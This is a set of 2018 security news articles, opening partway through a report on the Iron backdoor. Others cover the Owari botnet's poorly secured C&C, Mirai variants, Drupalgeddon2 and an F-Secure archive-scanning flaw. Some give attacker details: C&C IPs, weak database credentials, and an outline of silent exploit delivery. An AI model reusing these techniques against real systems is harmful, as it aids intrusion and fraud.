Part of the backdoor’s code is based on HackingTeam’s leaked RCS source code, the researchers say. Specifically, the cybercriminals used two main functions in their IronStealer and Iron ransomware families.

These include a virtual machine detection code taken directly from HackingTeam’s “Soldier” implant (which targets Cuckoo Sandbox, VMware products, and Oracle’s VirtualBox) and the DynamicCall module from HackingTeam’s “core” library (dynamically calls external library function by obfuscating the function name, thus making static analysis more difficult).

The malicious Chrome extension dropped by the malware is a patched version of Adblock Plus, which injects an in-browser crypto-mining module (based on CryptoNoter) and an in-browser payment hijacking module.

The extension constantly runs in the background, as a stealth host based crypto-miner. Every minute, the malware checks if Chrome is running, and can silently launch it if it doesn’t.

The backdoor also embeds Adblock Plus for IE, also modified similarly to the Chrome extension and capable of injecting remote JavaScript. This functionality, however, is no longer automatically used, the researchers discovered.

If Qhioo360 Safe Guard or Internet Security are found on the system, the malware runs once, without persistence. Otherwise, it installs the aforementioned rogue, hardcoded root CA certificate to make the backdoor binary seem legitimate.

The malware would decrypt a shellcode that loads Cobalt Strike beacon in-memory, and fetches a payload URL from a hardcoded Pastebin paste address.

Two different payloads were dropped by the malware, namely Xagent, a variant of “JbossMiner Mining Worm,” and the Iron ransomware, which started being dropped only recently.

The Iron backdoor drops the latest voidtool Everything search utility and silently installs it to use it for finding files likely containing cryptocurrency wallets (it targets around 20 wallets).

“IronStealer constantly monitors the user’s clipboard for Bitcoin, Monero & Ethereum wallet address regex patterns. Once matched, it will automatically replace it with the attacker’s wallet address so the victim would unknowingly transfer money to the attacker’s account,” the researchers explain.


Apple Touts Privacy Features of New Operating Systems
6.6.2018 securityweek Apple

Apple on Monday said new operating systems powering its mobile devices and computers would include features designed to thwart the use of secret trackers to monitor people's online activities.

The announcement by Apple comes amid a growing focus on protecting privacy following a Facebook data scandal and new rules being enforced by the European Union for online services.

Apple, kicking off its annual developers conference, announced that coming versions of software powering iPhone and Mac computers will block the use of so-called "cookies" from "like" buttons that can follow people from one website to another.

"Turns out 'like' buttons and 'comment' fields can be used to track you, so this year we are shutting that down," Apple senior vice president of software engineering Craig Federighi told a standing-room crowd of some 6,000 developers at Apple's Worldwide Developers Conference in the heart of Silicon Valley.

New MacOS Mojave and iOS 12 software to be release later this year will also make it harder to use trackers to create "unique fingerprints" by gleaning data about devices being used, according to Federighi.

"It will become dramatically more difficult for data companies to identify your device and track you," Federighi said.

"We are bringing all these protections to both Mojave and iOS 12."

Enhanced privacy was part of a slew of improvements touted by Apple to developers, whose creations are key to the popularity of iPhones, iPads and Mac computers.

Apple's software upgrades also include features that help users understand how much time they are spending on their devices, amid concerns of growing smartphone "addiction."


26 Million Users Hit by Ticketfly Hack
6.6.2018 securityweek Hacking

Ticketfly, the ticket distribution service owned by Eventbrite, has started restoring services after its website was defaced by a hacker who also gained access to user information.

The attack took place on or around May 30, when a hacker decided to exploit a vulnerability he had found in Ticketfly systems. The attacker, using the online moniker “IsHaKdZ,” reportedly asked the company to pay 1 bitcoin for information on the security hole. Since Ticketfly did not comply with his request, IsHaKdZ defaced ticketfly.com and the websites of several music venues.

The hacker also stole and leaked the details of Ticketfly customers and employees. Troy Hunt, the owner of the Have I Been Pwned data breach notification service, has analyzed the data and determined that over 26 million unique users are impacted. The compromised data includes email addresses, names, physical addresses and phone numbers.

The hack appears to have targeted Ticketfly’s WordPress-based assets. WordPress is also used for Ticketfly-powered websites provided to music venues, which would explain how the hacker managed to deface several sites.

Ticketfly hacked

Ticketfly says it has started restoring some of the affected services, including Box Office, Emailer, reporting, scanning, printing, and ticket purchasing systems.

“We’re rolling out a secure website solution as an alternative to your Ticketfly-powered site to meet your immediate needs. We’ve built a secure, non-WordPress based website solution with your existing domain, and your site will appear sometime today,” the company told customers in an updated FAQ.

The company has not shared too many details on the impact of the breach, but it has confirmed that names, addresses, email addresses, and phone numbers belonging to Ticketfly fans have been compromised.

“Our investigation into the incident is ongoing. It's critical that the information we share with you is accurate and backed by certainty. We are working with a team of forensic cybersecurity experts; the reality is cyber incidents are unique, and the investigations typically take more time than one would like because the full picture of what happened isn't always quick to develop,” Ticketfly said.


Germany's Continental Bans WhatsApp From Work Phones
6.6.2018 securityweek
Social

German car parts supplier Continental on Tuesday said it was banning the use of WhatsApp and Snapchat on work-issued mobile phones "with immediate effect" because of data protection concerns.

The company said such social media apps had "deficiencies" that made it difficult to comply with tough new EU data protection legislation, especially their insistence on having access to a user's contact list.

"Continental is prohibiting its employees from using social media apps like WhatsApp and Snapchat in its global company network, effective immediately," the firm said in a statement.

Some 36,000 employees would be affected by the move, a Continental spokesman told AFP.

The company, one of the world's leading makers of car parts, has over 240,000 staff globally.

A key principle of the European Union's new general data protection regulation (GDPR), which came into force on May 25, is that individuals must explicitly grant permission for their data to be used.

But Continental said that by demanding full access to address books, WhatsApp for example had shifted the burden onto the user, essentially expecting them to contact everyone in their phone to let them know their data was being shared.

"We think it is unacceptable to transfer to users the responsibility of complying with data protection laws," said Continental's CEO Elmar Degenhart.

The Hanover-based firm said it stood ready to reverse its decision once the service providers "change the basic settings to ensure that their apps comply with data-protection regulations by default".

The issue of how personal information is used and shared online was given fresh urgency after Facebook earlier this year admitted to a massive privacy breach that allowed a political consultancy linked to US President Donald Trump's 2016 campaign to harvest the data of up to 87 million users.


Many Drupal Sites Still Vulnerable to Drupalgeddon2 Attacks
6.6.2018 securityweek Attack

At least 115,000 websites powered by version 7 of the Drupal content management system are still vulnerable to Drupalgeddon2 attacks, despite patches being available since late March.

The flaw dubbed Drupalgeddon2 is officially tracked as CVE-2018-7600. It allows a remote attacker to execute arbitrary code and take complete control of a website running Drupal 6, 7 or 8. The issue has been patched since the release of versions 7.58, 8.5.1, 8.3.9 and 8.4.6, with fixes also available for Drupal 6, which is no longer supported since February 2016.

Drupalgeddon2 has been exploited by malicious actors for both server-side and client-side attacks that deliver cryptocurrency miners, backdoors, RATs and tech support scams.Many Drupal websites still affected by Drupalgeddon 2 vulnerability

Despite the high risk of attacks, many administrators of Drupal websites still haven’t applied the patches.

Researcher Troy Mursch has conducted an analysis of Drupal 7 websites – Drupal 7 is the most widely used version and it currently powers more than 830,000 sites – and found that many are still vulnerable.

Mursch identified nearly 500,000 Drupal 7 websites through the PublicWWW source code search engine and found that 115,070 had been running outdated and vulnerable versions of the CMS. The analysis showed that roughly 134,000 sites had not been vulnerable, while for 225,000 the version they had been using could not be determined.

“Numerous vulnerable sites found in the Alexa Top 1 Million included websites of major educational institutions in the United States and government organizations around the world. Other notable unpatched sites found were of a large television network, a multinational mass media and entertainment conglomerate, and two well-known computer hardware manufacturers,” Mursch wrote on his Bad Packets Report blog.

The list of vulnerable websites has not been made public, but the researcher did send it to US-CERT and the Drupal Security Team.

While conducting the analysis, Mursch discovered a significant cryptojacking campaign that leverages the Coinhive service. Malicious actors managed to compromise at least 258 Drupal sites and abused them to mine for cryptocurrency. The list of victims included the Attorney General’s Office in Colorado, a police department in Belgium, and Fiat-owned automotive parts manufacturer Magneti Marelli.

An India-based research organization hit by this campaign had updated Drupal, but it failed to remove the malicious code. As the Drupal Security Team warned, updating the CMS does not remove malicious code from already compromised websites.

This is the second cryptojacking campaign discovered by Mursch since the disclosure of Drupalgeddon2. In early May, he reported discovering more than 300 websites hacked in a similar operation, including sites belonging to universities and governments.

During the analysis of Drupalgeddon2, the Drupal Security Team and developer Jasper Mattsson, who also reported the original vulnerability, identified another flaw. This second vulnerability, tracked as CVE-2018-7602 and dubbed by some Drupalgeddon3, has also been exploited in the wild.


Apple Boosts Security in iOS 12, macOS Mojave
6.6.2018 securityweek Apple

At its Worldwide Developers Conference (WWDC) 2018 this week, Apple shared information on the security improvements that iOS 12 and macOS Mojave are set to bring when they arrive this fall.

While previewing the next platform iterations at the event, Apple revealed features that will change the overall user experience on both mobile and desktop devices, but also presented enhancements that should improve the overall privacy and security of its users.

One of the main changes impacts the Safari browser on both iOS and macOS, which will soon deliver improved Intelligent Tracking Prevention capabilities, preventing social media buttons (such as “Like” and “Share”) from tracking users without permission.

“Safari now also presents simplified system information when users browse the web, preventing them from being tracked based on their system configuration,” the iPhone maker says.

Other features the company previewed for the upcoming platform iterations include end-to-end encryption for Facetime group calls and password managers integrated into macOS and iOS, to help users employ stronger passwords, store them securely, and automatically enter them when needed.

“Safari now also automatically creates, autofills and stores strong passwords when users create new online accounts and flags reused passwords so users can change them,” Apple said.

On macOS Mojave, new data protections will require applications to ask for user permission before using the camera and microphone or before accessing personal data such as mail history and messages database, the tech giant also says. This should prevent malicious software from spying on users.

To further strengthen user privacy, Apple also appears set to roll out a USB Restricted Mode in iOS 12, a feature that was initially noticed in iOS 11.3 beta, but later removed, only to be introduced in iOS 11.4 beta again.

With this new feature, an iPhone connected via USB to a computer (or to an USB accessory) will ask for the passcode every week, or it will lock down the Lightning port in charge only mode, thus preventing access to the data.

“To improve security, for a locked iOS device to communicate with USB accessories you must connect an accessory via lightning connector to the device while unlocked—or enter your device passcode while connected—at least once a week,” Apple described the feature in iOS 11.3 beta.

As ElcomSoft’s Oleg Afonin pointed out last month, this means that law enforcement agencies attempting to retrieve data from a suspect’s iPhone will only have a small window of opportunity before the device locks down. The same applies to thieves and anyone else targeting that data.

The new feature appears as a reaction to a clash with the FBI a couple of years ago over the unlocking of the San Bernardino shooter’s iPhone. The legal battle eventually sparked a debate between supporters of backdoors in user products to facilitate criminal and national security investigations, and those who want data to be properly protected.

Later this month, as part of iOS 12 public beta, users will also take advantage of increased control over notifications, and will get detailed information on the time spent on the phone, courtesy of a new Screen Time feature. There’s also an App Limits feature to limit the time spent in an app, which gives parents more control over their children’s use of a mobile device.


IBM Adds New Features to MaaS360 with Watson UEM Product
6.6.2018 securityweek IT

IBM announced on Monday that it has added two new important features to its “MaaS360 with Watson” unified endpoint management (UEM) solution.

UEM solutions allow enterprise IT teams to manage smartphones, tablets, laptops and IoT devices in their organization from a single management console.

IBM has improved its MaaS360 with Watson UEM product with two capabilities the company says can be highly useful for IT departments: app intelligence and reporting, and security policy recommendations.

Business Dashboards for Apps is designed to provide administrators information on mobile applications and how they are used by employees. This can help them get a better understanding of which apps require attention and investment and which ones can be removed.

IT teams can obtain information on the number of installs (by platform, manufacturer and ownership), usage (popularity and session length), performance (crashes and data usage), and trend information (crashes, network requests and data consumption over a period of six months). Admins can also apply filters to make analysis easier and more useful.

The second new feature, the Policy Recommendation Engine, helps IT teams by dynamically providing recommendations when configuring security policies. Recommendations are provided based on the organization’s profile and common practices observed at similar companies in the MaaS360 community.

“Imagine a way to configure your policies with guidance that is dynamically presented every step of the way, catered to your organization and the size of your deployment. Whether you’re new to the game — or have been managing policies for years — a little confidence in your configurations goes a long way,” IBM Security’s John Harrington Jr. said in a blog post.

IBM also announced this week the launch of Guardium Analyzer, a new tool that uses a specialized data classification engine and data patterns to identify and classify GDPR-relevant information across cloud and on-premise systems. The tool can also identify the databases most likely to fail a GDPR-focused audit, the company said.


Oops! Botnet Operators Use Default Credentials on Command and Control Server
6.6.2018 securityweek BotNet  IoT

Internet of Things (IoT) botnets prey on the use of default or weak credentials to compromise connected devices, but the operators of such a botnet also used default credentials in their operations.

As NewSky Security researchers recently discovered, the operators of the Mirai variant Owari botnet used default credentials on their command and control (C&C) server, thus allowing easy access their database.

First spotted in late 2016, Mirai was designed to target poorly secured devices to ensnare them into large distributed denial of service (DDoS) botnets. Ever since its source code leaked online, Mirai spawned numerous variants, such as Masuta, Satori, and Okiru, as well as the more recent Wicked, Sora, Owari, and Omni iterations.

What most of these variants inherit from Mirai, the security researchers say, is the use of a MySQL database server for C&C. This database, they reveal, contains three tables: users, history, and whitelist.

A recently observed Mirai variant named Owari is using this MySQL server structure, but its operators made the very same mistakes as the owners of the devices they targeted: they failed to properly secure the server.

Thus, NewSky Security stumbled upon an Owari server on IP 80(.)211(.)232(.)43, with port 3306, the default port for MySQL database, open to the Internet.

What’s more, the security researchers discovered that the attackers used the root:root username and password pair, “one of the weakest credentials known to mankind,” to secure the database, and also enabled read/write access to everyone.

As Dr. Vesselin Bontchev points out, it’s not that easy to make a MySQL database accessible from anywhere, nonetheless to secure it so poorly that anyone can connect to it.

Vess
@VessOnSecurity
4 Jun
It's not exactly spelled out in the article, but the perp wasn't just stupid (using weak credentials). He was *creatively* stupid. You have to try hard, in order to make a MySQL database accessible to the whole world. Not something you can do accidentally. https://twitter.com/ankit_anubhav/status/1003741307024625666 …

Vess
@VessOnSecurity
Like, by default, MySQL listens only to localhost. If you really want to shoot yourself in the foot and access it over the Internet, it forces you to define *triplets* of user/password/host from which the database is accessible.

11:08 PM - Jun 4, 2018
See Vess's other Tweets
Twitter Ads info and privacy
Having access to the database, the security researchers glanced through the three tables. The users table contained login credentials (for both malware authors and customers), and information such as attack duration limits, maximum available bots, and cooldown time between commands.

“In the specific Owari case, we observe one user with duration limit of 3600 seconds with permissible bot usage set as -1 (maximum). It is to be noted that the credentials of all these botnet users are also weak,” the security researchers reveal.

The history table revealed details on attacks carried out against various IPs (some were IoT botnet related, suggesting that the attacker might have tried to target rival botnet operators), while the whitelist table was empty, suggesting that the botnet would attack any IP or device.

The security researchers also discovered that this was only one of the two Owari-related MySQL databases exposed to the Internet and secured with root:root, with the second one located at IP 80(.)211(.)45(.)89.

Unfortunately, although they gained write access to the MySQL databases, the researchers couldn’t disrupt the botnet, because C&C-related IPs usually have a short lifespan, as they tend to be flagged fast due to bad network traffic. Thus, they often change the IPs, and the two mentioned above are already offline.

Ankit Anubhav, Principal Researcher, NewSky Security, reveals that they decided to contact an Owari operator to ask about the revenue model, and learned that the cost of hiring the botnet is of $60 per month, which involves “around 600 seconds of bot time.” Because of that, the operator can “guarantee a stable bot count,” and can cover expenses with 10 to 15 customers each month.


Flaw in F-Secure Products Allowed Code Execution via Malicious Archives
6.6.2018 securityweek
Vulnerebility

A critical vulnerability affecting many consumer and corporate products from F-Secure could have been exploited for remote code execution using specially crafted archive files.

A researcher who uses the online moniker “landave” has identified several vulnerabilities related to 7-Zip, an open source file archiver used by many commercial products. Some of the security holes impact 7-Zip and products using it, while others are specific to the third-party implementations of 7-Zip.

Some of the vulnerabilities, disclosed in 2017, impact Bitdefender products. On Tuesday, landave published a blog post describing how one of the 7-Zip bugs he identified last year, namely CVE-2018-10115, can be used to achieve remote code execution on most F-Secure endpoint protection products for Windows.

The details of the vulnerability have been disclosed after F-Secure rolled out a patch via its automatic update mechanisms on May 22. Users don’t need to take any action, unless they explicitly disabled automatic updates.

The list of impacted products includes F-Secure SAFE for Windows, Client Security, Client Security Premium, Server Security, Server Security Premium, PSB Server Security, Email and Server Security, Email and Server Security Premium, PSB Email and Server Security, PSB Workstation Security, Computer Protection, and Computer Protection Premium.

Exploiting the vulnerability against 7-Zip directly was relatively easy and it only required the targeted user to extract a specially crafted RAR file. However, in the case of F-Secure products, exploitation is more difficult due to the use of the Address Space Layout Randomisation (ASLR) memory protection system.

However, landave has found a way to bypass the protection and achieve code execution via malicious RAR files. The attacker could have sent the malicious file to the victim attached to an email, but this attack scenario required that the recipient manually trigger a scan of the file.

A more efficient method involved getting the victim to visit a malicious web page set up to automatically download the exploit file.

“It turns out that F-Secure’s products intercept HTTP traffic and automatically scan files with up to 5MB in size. This automatic scan includes (by default) the extraction of compressed files. Hence, we can deliver our victim a web page that automatically downloads the exploit file. To do this silently (preventing the user even from noticing that a download is triggered), we can issue an asynchronous HTTP request,” the researcher explained.

In its own advisory, F-Secure said the flaw could have been exploited to take complete control of a system, but there was no evidence of exploitation before the release of the patch.

The security firm also pointed out that some user interaction was required for the exploit to work and noted that archive scanning is only triggered if the “Scan inside compressed files” option is enabled.

F-Secure has paid out a bug bounty, but the amount has not been disclosed. According to its Vulnerability Rewards Program page, the company offers up to €5,000 ($5,800) for vulnerabilities that allow remote code execution on the client software.


Fortinet Acquires Bradford Networks to Extend Security to the Edge
6.6.2018 securityweek IT

Fortinet has acquired Boston-based network security firm Bradford Networks. The purpose is to extend Fortinet's micro segmentation to the new perimeter: that is, the IoT and mobile edge.

A Fortinet spokesperson told SecurityWeek that it paid approximately $17 million in initial consideration, net of cash acquired and subject to certain adjustments. It may pay an additional $2 million as an earn-out, subject in certain performance conditions. According to Crunchbase, Bradford had raised roughly $14 million in funding.

Gartner predicts that the currently estimated 4 billion enterprise connected devices will grow to 7.5 billion in the next two years. Making sure that every one of those devices is both known and secure is difficult. It is, suggests Fortinet in a blog, a 'classic' example of the asynchronous security problem: "Security managers need to secure every single device every single time, while criminals only need one open port, one compromised or unknown device, or one uncontained threat to circumvent all of the effort going into securing the network."

"As large organizations continue to see high growth in network traffic and the number of devices and users accessing their networks," explains Ken Xie, founder, chairman of the board and CEO at Fortinet, "the risk of breach increases exponentially. According to a recent Forrester study, 82 percent of companies surveyed are unable to even identify all devices accessing their networks. The integration of Bradford Networks' technology with Fortinet's security fabric enables large enterprises with the continuous visibility, micro-segmentation and access control technology they need to contain threats and block untrusted devices from accessing the network."

Bradford Networks enhances Fortinet's Security Fabric by providing agentless visibility of endpoints, users, devices, and applications that access the complete corporate network including headless devices and IoT. It brings security to IoT through device micro segmentation and automatic policy assignment, allowing granular isolation of unsecure devices.

Once visibility of all devices that connect to the network is attained, the next step is to make sure they are authenticated or authorized, and are subject to a context driven policy that defines who, what, when, and where connectivity is permitted.

"Such an approach -- where no unknown devices ever gain access to the corporate infrastructure, permitted devices are automatically segmented based on policies and roles, and connected devices that begin to behave badly are immediately quarantined from the network," says Fortinet, "becomes the foundation for a comprehensive positive security posture."

Fortinet's share price has grown steadily, from $35.83 in September 2017 to $62.48 at the start of 4 June 2018. A slight dip occurred with the Bradford Networks announcement (down to $61.70), but the share price has already risen above the pre-acquisition price to its highest ever value at $62.92, at the time of writing.

Fortinet does not expect the transaction to have a material impact on the company's second quarter or full year 2018 financial guidance disclosed on May 3, 2018.

Rob Scott, CEO at Bradford Networks, said, "We are excited to join with Fortinet, the leader in network security to deliver exceptional visibility and security at scale to large enterprise organizations. Bradford Networks' technology is already integrated with Fortinet's Security Fabric including FortiGate, FortiSIEM, FortiSwitch and FortiAP products to minimize the risk and impact of cyber threats in even the toughest security environments such as critical infrastructure - power, oil and gas and manufacturing."

Bradford Networks, the Fortinet spokesperson said, "will become part of the Fortinet brand and will enrich Fortinet’s IoT offering. The majority of Bradford Networks employees will transfer to Fortinet and be integrated across multiple functions based on areas of responsibilities."


Facebook Says Chinese Phone Makers Got Access to Data
6.6.2018 securityweek
Social

Facebook on Tuesday confirmed that a Chinese phone maker deemed a national security threat by the US was among companies given access to data on users.

Huawei was able to access Facebook data to get the leading social network's applications to perform on smartphones, according to the California-based company.

"Facebook along with many other US tech companies have worked with them and other Chinese manufacturers to integrate their services onto these phones," Facebook mobile partnerships leader Francisco Varela said in a released statement.

"Given the interest from Congress, we wanted to make clear that all the information from these integrations with Huawei was stored on the device, not on Huawei's servers."

Facebook also had data access deals with Lenovo, OPPO and TCL of China, according to Varela.

"Facebook's integrations with Huawei, Lenovo, OPPO and TCL were controlled from the get go," Varela said.

Huawei has long disputed any links to the Chinese government, while noting that its infrastructure and computing products are used in 170 countries.

"Concerns about Huawei aren't new," US Senator Mark Warner, vice chairman of the senate select committee on intelligence, said Tuesday in a released statement.

"I look forward to learning more about how Facebook ensured that information about their users was not sent to Chinese servers."

Facebook said that it does not know of any privacy abuse by cellphone makers who years ago were able to gain access to personal data on users and their friends.

Before now-ubiquitous apps standardized the social media experience on smartphones, some 60 device makers like Amazon, Apple, Blackberry, HTC, Microsoft and Samsung worked with Facebook to adapt interfaces for the Facebook website to their own phones, the company said.

Facebook said it is winding up the interface arrangements with device makers as the company's smartphone apps dominate the service. The integration partnership with Huawei will terminate by the end of this week, according to the social network.

The social media leader said it "disagreed" with the conclusions of a New York Times report that found that the device makers could access information on Facebook users' friends without their explicit consent.

Facebook enabled device makers to interface with it at a time when it was building its service and they were developing new smartphone and social media technology.

But the report raised concerns that massive databases on users and their friends -- including personal data and photographs -- could be in the hands of device makers.


Mirai Variants Continue to Spawn in Vulnerable IoT Ecosystem
6.6.2018 securityweek BotNet

Mirai is the archetypal IoT botnet, first achieving infamy with a 665 Gbps DDoS attack against the KrebsOnSecurity website in September 2016. Within days, a second Mirai attack targeted the French hosting firm, OVH, with an attack that peaked at nearly 1 Tbps. These were, at the time, the largest DDoS attacks ever recorded.

But within a few more days, before the end of September 2016, the Mirai developer released the source code. It can now be found on GitHub. The developer closed his 'readme' file with a criticism of MalwareMustDie and the comment, "Just as I forever be free, you will be doomed to mediocracy forever."

He didn't remain free for very long. In January 2017, Brian Krebs identified Paras Jha as authoring Mirai; and in December 2017 the DoJ unsealed a plea-bargained guilty plea by Paras Jha for the development and use of Mirai. But it was too late to stop Mirai, because the code was in the public domain -- and it has ever since been used as the basic building block for other criminals to develop Mirai variants for their own use.

IoT ExploitsNetwork performance firm Netscout Arbor has taken a close look at four of the current Mirai variants: Satori, JenX, OMG and Wicked. Its Arbor Security Engineering & Response Team (ASERT) published in a recent blog post, describing how each of these botnets start from the basic building blocks of Mirai and add to and sometimes remove from the original Mirai functionality -- adding, says, ASERT, "their own flair."

Mirai itself spread by scanning for other internet-connected IoT devices (IP cameras and home routers) and 'brute-forcing' access via a list of default vendor passwords. Since so few consumers ever change the password that comes with the device, the process is remarkably successful. Paras Jha claimed that he had 380,000 bots in Mirai at the time of the Krebs attack.

Satori (or at least the 3rd variant of Satori) uses the same configuration table and the same string obfuscation technique as Mirai. However, says ASERT, "We see the author expanding on Mirai source code to include different exploits such as the Huawei Home Gateway exploit." The exploit was CVE-2017-17215. In December 2017, Check Point reported that hundreds of thousands of attempts to exploit this vulnerability had been made on Huawei HG532 home routers attempting to download and execute the Satori botnet.

The underlying code for JenX also comes from Mirai, again including the same configuration table and the same string obfuscation technique. However, JenX hard codes the C2 IP address while Mirai stores it in the configuration table. JenX has also removed the scanning and exploitation functions of Mirai, with this being handled by a separate system.

"Currently," writes ASERT, "it appears JenX only focuses on DDoS attacks against players of the video game Grand Theft Auto San Andreas, which has been noted by other researchers."

OMG is described by ASERT as one of the most interesting of Mirai variants. While it includes all Mirai's functionality, "the author expanded the Mirai code to include a proxy server." This allows it to enable a SOCKS and HTTP proxy server on the infected IoT device. "With these two features, the bot author can proxy any traffic of its choosing through the infected IoT device, including additional scans for new vulnerabilities, launching additional attacks, or pivot from the infected IoT device to other networks which are connected to the device."

Fortinet discussed OMG in February 2018. "This is the first time we have seen a modified Mirai capable of DDOS attacks as well as setting up proxy servers on vulnerable IoT devices. With this development, we believe that more and more Mirai-based bots are going to emerge with new ways of monetization," it concluded.

Wicked is the latest Mirai variant. "Similar to Satori variant 3," writes ASERT, "Wicked trades in Mirai's credential scanning function for its own RCE scanner. Wicked's RCE scanner targets Netgear routers and CCTV-DVR devices." When vulnerable devices are found, "a copy of the Owari bot is downloaded and executed."

However, an analysis of the same bot by Fortinet in May 2018 comes to a slightly different conclusion. The string 'SoraLOADER' suggests a purpose to distribute the Sora botnet. Further analysis showed that in practice it attempted to download the Owari botnet, but actually downloaded the Omni botnet. "We can essentially confirm that the author of the botnets Wicked, Sora, Owari, and Omni are one and the same. This also leads us to the conclusion that while the WICKED bot was originally meant to deliver the Sora botnet, it was later repurposed to serve the author's succeeding projects," says Fortinet.

The Mirai developer may have been apprehended, but in making his source code public, Mirai and Mirai variants continue to grow. The IoT ecosphere that Mirai and its variants target and exploit is still in its infancy. There were nearly 17 billion connected devices in 2017; but this is expected to rise to around 125 billion by 2030 according to a new analysis from IHS Markit. Vendors continue to rush their products in order to get early market share, but often at the cost of built in security.

"Malware authors will continue to leverage IoT based malware in automated fashion, quickly increasing the botnet size through worm-like spreading, network proxy functionality, and automated exploitation of vulnerabilities in internet facing devices. It is important for organizations to apply proper patching, updates, and DDoS mitigation strategies to defend their organizations," warns ASERT.


It’s not a joke, Owari botnet operators used root as username and password to access a C&C
6.6.2018 securityaffairs BotNet

Security expert Ankit Anubhav discovered a Command and Control server for the Owari botnet protected with weak credentials.
An IoT botnet has been commandeered by white hats after its controllers used a weak username and password combination for its command-and-control server.

Security expert Ankit Anubhav from Newsky Security discovered an IoT botnet that was controlled by an architecture poorly configured, the botmaster used weak credentials for the authentication to the command-and-control server.

The researchers exploited week configuration to take over the MySQL server used to control the Owari botnet, the author left port 3306 open allowing the authentication with “root” as username and password.

“We observed few IPs attacking our honeypots with default credentials, with executing commands like /bin/busybox OWARI post successful login. In one of the cases, a payload hosted on 80(.)211(.)232(.)43 was attempted to be run post download.

When we investigated the IP, we observed that port 3306, the default port for MySQL database, was open.” reads the blog post published by Ankit Anubhav.

“We tried to investigate more into this IP. To our surprise, it is connected to the attacker’s servers using one of the weakest credentials known to mankind.

Username: root
Password: root“

The situation is paradoxical considering that Mirai-based botnets, including Owari, spread through Internet-of-Things devices by brute-force guessing passwords and taking advantage of default credentials.

Database investigation conducted by the experts allowed the expert to discover a User table that contains login credentials for various users who will control the botnet. Some entries could be associated with botmasters or customers of the botnet

“User table contains login credentials for various users who will control the botnet. Some of them can be botnet creators, or some can simply be the customers of the botnet, a.k.a black box users, who pay a sum of money to launch DDoS attacks. Besides credentials, duration limit such as for how much time the user can perform the DDoS, maximum available bots for attack (-1 means the entire botnet army of the bot master is available) and cooldown time (time interval between the two attack commands) can also be observed.” continues the expert.

“In the specific Owari case, we observe one user with duration limit of 3600 seconds with permissible bot usage set as -1(maximum). It is to be noted that the credentials of all these botnet users are also weak.”

Owari botnet

The expert also discovered a history table containing information on the DDoS attacks carried out against various targets. Some of the IP addresses targeted by the botnet were associated with rival IoT botnets.

Anubhav also investigated the revenue model behind the Owari botnet, he was able to reach a known Owari operator that goes online as “Scarface” that provided the following comment:

“For 60$ / month, I usually offer around 600 seconds of boot time, which is low compared to what other people offer. However, it is the only way I can guarantee a stable bot count.” explained Scarface.

“I can’t allow having 10+ people doing concurrent attacks of 1800 seconds each. Usually there is no cooldown on my spots. If I decide to give the cooldown, it’s about 60 seconds or less. 60$/month is not much but when you get 10–15 costumers per month it is enough to cover most of my virtual expenses”

Is this the end for the Owari botnet?

Of course no, even if the expert has taken over the MySQL database, botnet operators continuously change attack IPs to remain under the radar even when the malicious traffic associated to some of their IPs is detected.

The IPs reported in the analysis of the expert are already offline.


North Korea-Linked Covellite APT group stopped targeting organizations in the U.S.
6.6.2018 securityaffairs APT

A North Korea-linked APT group, tracked by experts at industrial cybersecurity firm Dragos as Covellite, has stopped targeting US organizations.
Anyway, the group, that is believed to be linked to the notorious Lazarus APT group, is continuing to target organizations in Europe and East Asia.

The group has been around at least since 2017 and is still active, the APT has targeted civilian electric energy organizations to steal intellectual property and gather intelligence on industrial operations.

Differently, from other threat actors that are focused on industrial control systems, Covellite seems to be not interested in sabotage.

In September 2017, experts from FireEye spotted a wave of attacks launched by the APT group against U.S. electric companies, the phishing messages used weaponized Word documents to deliver a piece of malware.

“COVELLITE compromises networks associated with civilian electric energy worldwide and gathers intelligence on intellectual property and internal industrial operations. COVELLITE lacks an industrial control system (ICS) specific capability at this time.” reads the post published by Dragos.

“COVELLITE operates globally with targets primarily in Europe, East Asia, and North America. US targets emerged in September 2017 with a small, targeted phishing campaign directed at select U.S. electric companies.”

The experts linked the attacks to Pyongyang and confirmed that the group did not show the ability to disrupt power supply.

Covellite

According to Dragos, the infrastructure and the malicious code used by the COVELLITE group are similar to the ones used by the LAZARUS APT GROUP, aka Hidden Cobra.

“technical analysis of COVELLITE malware indicates an evolution from known LAZARUS toolkits. However, aside from technical overlap, it is not known how the capabilities and operations between COVELLITE and LAZARUS are related.” continues the post.

“Given the group’s specific interest in infrastructure operations, rapidly improving capabilities, and history of aggressive targeting, Dragos considers this group a primary threat to the ICS industry,”

Dragos experts have recently published reports on other hacker groups focused on ICS and SCADA systems, including Iran-linked Chrysene, Russia-linked Allanite, and Xenotime.


Thousands of organizations leak sensitive data via misconfigured Google Groups
6.6.2018 securityaffairs Security

Security experts reported widespread Google Groups misconfiguration exposes sensitive information.
Administrators of organizations using Google Groups and G Suite must review their configuration to avoid the leakage of internal information.

Security researchers from Kenna Security have recently discovered that 31 percent of 9,600 organizations analyzed is leaking sensitive e-mail information.

The list of affected entities also includes Fortune 500 companies, hospitals, universities and colleges, newspapers and television stations, and even US government agencies.

“Organizations utilizing G Suite are provided access to the Google Groups product, a web forum directly integrated with an organization’s mailing lists. Administrators may configure a Google Groups interface when creating a mailing list.” reads the blog post published by Kenna Security.

“Due to complexity in terminology and organization-wide vs group-specific permissions, it’s possible for list administrators to inadvertently expose email list contents. In practice, this affects a significant number of organizations”

The discovery is not new, back in 2017 experts discovered wrong configurations of G Suite that can lead to data leakage.

Unfortunately, since the first advisory published by experts at RedLock, many installs continue to leak data. According to Kenna Security, the main reason is Google Groups uses a complex terminology and organisation-wide vs group-specific permissions.

“Due to complexity in terminology and organization-wide vs group-specific permissions, it’s possible for list administrators to inadvertently expose email list contents. In practice, this affects a significant number of organizations” continues the post.

When a G Suite admin creates a Groups mailing list for specific recipients, it configures a Web interface for the list, available to users at https://groups.google.com.

Google Group privacy settings for individuals can be adjusted on both a domain and a per-group basis. In affected organizations, the Groups visibility setting is available by searching “Groups Visibility” after logging into https://admin.google.com and it is configured to “Public on the Internet”

Google Groups

To discover if an organization is affected, administrators can browse to the configuration page by logging into G Suite as an administrator and typing “Settings for Groups for Business” or simply using this direct link.

“In almost all cases – unless you’re explicitly using the Google Groups web interface – this should be set to “Private”.” continues the post.

“If publicly accessible, you may access your organization’s public listing at the following link: https://groups.google.com/a/[DOMAIN]/forum/#!forumsearch/”

Administrators have to set as private the “Google Group” to protect internal information such as customer reviews, invoices payable, password recovery / reset e-mails, and more.

It is important to highlight that Google doesn’t consider configuration issues as a vulnerability, experts recommend administrators to read the Google Groups documentation, set the sharing setting for “Outside this domain – access to groups” to “private”.


